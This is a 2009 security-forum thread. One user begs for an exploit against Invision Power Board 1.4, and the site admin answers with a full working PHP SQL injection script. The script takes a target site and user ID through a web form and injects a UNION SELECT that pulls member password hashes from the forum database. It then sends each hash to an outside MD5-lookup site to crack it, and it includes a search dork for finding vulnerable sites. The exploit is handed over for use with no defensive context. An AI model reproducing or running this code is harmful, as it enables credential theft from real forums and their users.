|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~ |
|
Posted: Thu Mar 19, 2009 11:17 am |
|
|
BenMix2 |
Advanced user |
|
|
Joined: Jan 08, 2009 |
Posts: 65 |
|
|
|
|
|
|
|
I really need an Exploit for Invision Power Board 1.4, Please I really need it, very urgently.
Also, if you have any exploit that works on that system, please give it to me.
Thanks. |
|
|
|
|
|
plzplzplz |
|
Posted: Thu Mar 19, 2009 2:46 pm |
|
|
BenMix2 |
Advanced user |
|
|
Joined: Jan 08, 2009 |
Posts: 65 |
|
|
|
|
|
|
|
*up*
plz plz help!
i really need this!!!! |
|
|
|
|
|
|
|
|
Posted: Thu Mar 19, 2009 3:16 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This is something I found for IPB 1.4, maybe works, maybe not ... just try it ...
Code: |
<?php
//----------------------------------------------------------------------------------------------------//
// Invision Power Board Calendar SQL Injection Exploit
// Found by WaReZ
// Dork : "Powered by Invision Power Board (U) v1.4 Final 2005 IPS"
//----------------------------------------------------------------------------------------------------//
// Coded by Pr0T3cT10n < Pr0T3cT10n@Gmail.Com >
// KamikaZ-Team
// ISRAEL
//----------------------------------------------------------------------------------------------------//
set_time_limit(0);
ignore_user_abort(0);
function pull_out_md5($site, $path, $id)
{
echo('<div align="left" class="text">Exploiting..<br />');
$contents = file_get_contents('http://www.' .$site.$path. 'index.php?act=calendar&m=3&y=2008+AND+1=0+UNION+SELECT+1,id,2008,3,1,password,password,0x2A,password,password,password,password,password,password,password,password,password,password,password,password,password+FROM+ibf_members+where+id+=+' .$id. '+UNION+SELECT+*+FROM+ibf_calendar_events+WHERE+1=1');
if(preg_match("/eventid\=1\'\>([a-z0-9]+)\</", $contents, $matches))
{
echo('Found hash(' .$matches[1]. ')!<br />Try to crack it..<br />');
$md5_search = file_get_contents('http://gdataonline.com/qkhash.php?mode=txt&hash=' .$matches[1]);
if(preg_match("/<td width=\"35%\"><b>(.*)<\/b><\/td>/", $md5_search, $results))
echo('OK, <b>Cracked</b>(<b>' .$matches[1]. ' = ' .$results[1]. '</b>)<br />');
else
{
echo('Failed.<br />');
echo('Hash: ' .$matches[1]);
}
}
echo('</div>');
}
?>
<html dir="ltr">
<head>
<title>Invision Power Board Calendar SQL Injection Exploit</title>
<style>
* { background-color: #000000; font-family: Verdana; color: #999999; }
.text { font-size: 12px; }
a:link, a:visited, a:active { color: #e3e2e2; text-decoration: none; font-size: 11px;}
a:hover { color: #1774ba; font-size: 11px; }
input, textarea, select { background-color: black; color: #a6a6a6; border: solid 1px #363636; }
input:hover, textarea:hover { border-color: #D0D0D0; }
input:focus, textarea:focus { border-color: #F0E80A; color: #FFFFFF; }
</style>
</head>
<body>
<div align="left"><h2><u>Invision Power Board Calendar SQL Injection Exploit</u></h2></div>
<?php
if($_POST['site'] && $_POST['path'] && $_POST['id'] && $_POST['submit'])
pull_out_md5($_POST['site'], $_POST['path'], $_POST['id']);
else
echo('<div align="left"><form method="POST" action="?"><table class="text"><tr><td>Site:</td><td><input type="text" name="site"></td></tr><tr><td>Path:</td><td><input type="text" name="path"></td></tr><tr><td>User ID:</td><td><input type="text" name="id"></td></tr><tr><td><input type="submit" name="submit" value="Submit"></td></tr></table></form></div>');
?>
</body>
</html>
|
|
|
|
|
|
|
|
|
|
Posted: Thu Mar 19, 2009 6:13 pm |
|
|
BenMix2 |
Advanced user |
|
|
Joined: Jan 08, 2009 |
Posts: 65 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|